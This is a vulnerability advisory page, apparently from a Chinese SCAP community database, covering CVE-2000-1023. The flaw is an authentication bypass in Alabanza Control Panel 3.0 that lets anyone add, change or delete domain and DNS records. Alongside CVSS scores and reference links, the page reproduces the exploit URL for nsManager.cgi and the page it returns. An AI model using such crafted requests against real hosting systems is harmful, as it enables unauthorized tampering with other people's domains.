CVE-2000-1023
CVSS7.5
发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:27
NMCOES    

[原文]The Alabanza Control Panel does not require passwords to access administrative commands, which allows remote attackers to modify domain name information via the nsManager.cgi CGI program.


[CNNVD]Alabanza Control Panel域名修改漏洞(CNNVD-200012-052)

        Alabanza Control Pane不需要密码访问管理命令。远程攻击者借助nsManager.cgi CGI程序修改域名信息。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1023
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1023
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-052
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1710
(VENDOR_ADVISORY)  BID  1710
http://xforce.iss.net/static/5284.php
(UNKNOWN)  XF  alabanza-unauthorized-access
http://www.securityfocus.com/archive/1/84766
(UNKNOWN)  BUGTRAQ  20000924 Major Vulnerability in Alabanza Control Panel

- 漏洞信息

Alabanza Control Panel域名修改漏洞
高危 访问验证错误
2000-12-11 00:00:00 2005-10-20 00:00:00
远程※本地  
        Alabanza Control Pane不需要密码访问管理命令。远程攻击者借助nsManager.cgi CGI程序修改域名信息。

- 公告与补丁

        A security patch has been applied to remedy the problem. Scripts that had been disabled to prevent this vulnerablity have once again been restored to normal status.

- 漏洞信息 (20238)

Alabanza Control Panel 3.0 Domain Modification Vulnerability (EDBID:20238)
cgi remote
2000-09-24 Verified
0 Weihan Leow
N/A [点击下载]
source: http://www.securityfocus.com/bid/1710/info

Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.

Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.

Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).

To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):

http://target/cp/rac/nsManager.cgi?Domain=<example.com>&IP=<IP address>&OP=add&Language=english&Submit=Confirm

Accessing the following URL:

http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&IP=127.0.0.1&OP=add&Language=english&Submit=Confirm

will display a page stating:

"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com <IP address> will be setup within 1 hour!

Please click here to go back."

From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.

		

- 漏洞信息

13750
Alabanza Control Panel nsManager.cgi Unauthorized Domain Name Modification
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-09-24 Unknow
2000-09-24 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Alabanza Control Panel Domain Modification Vulnerability
Access Validation Error 1710
Yes Yes
2000-09-24 12:00:00 2009-07-11 03:56:00
Posted to Bugtraq on September 24, 2000 by Weihan Leow <wleow@buffalo.edu>.

- 受影响的程序版本

Alabanza Control Panel 3.0

- 漏洞讨论

Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration.

Modification, deletion, and addition of domains and MX and CNAME records associated with Alabanza hosts and resellers does not require valid authentication and can be conducted by any remote user.

Access to the Control Panel which handles administrative controls for domains associated with Alabanza does not require a username and password if specially crafted URLs are requested (see the exploit tab for further details).

- 漏洞利用

To add a domain to the name server (using example.com as an example and 'target' being an Alabanza host/reseller domain):

http://target/cp/rac/nsManager.cgi?Domain=&lt;example.com&gt;&amp;IP=&lt;IP address&gt;&amp;OP=add&amp;Language=english&amp;Submit=Confirm

Accessing the following URL:

http://www.example.com/cp/rac/nsManager.cgi?Domain=HAHAHA.org&amp;IP=127.0.0.1&amp;OP=add&amp;Language=english&amp;Submit=Confirm

will display a page stating:

"Name Server Manager
Domain example.com will be added within 1 hour!
Your domain example.com &lt;IP address&gt; will be setup within 1 hour!

Please click here to go back."

From here modification, deletion, and addition of domains can be made, as well as changing the default MX or CNAME records.

- 解决方案

A security patch has been applied to remedy the problem. Scripts that had been disabled to prevent this vulnerablity have once again been restored to normal status.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站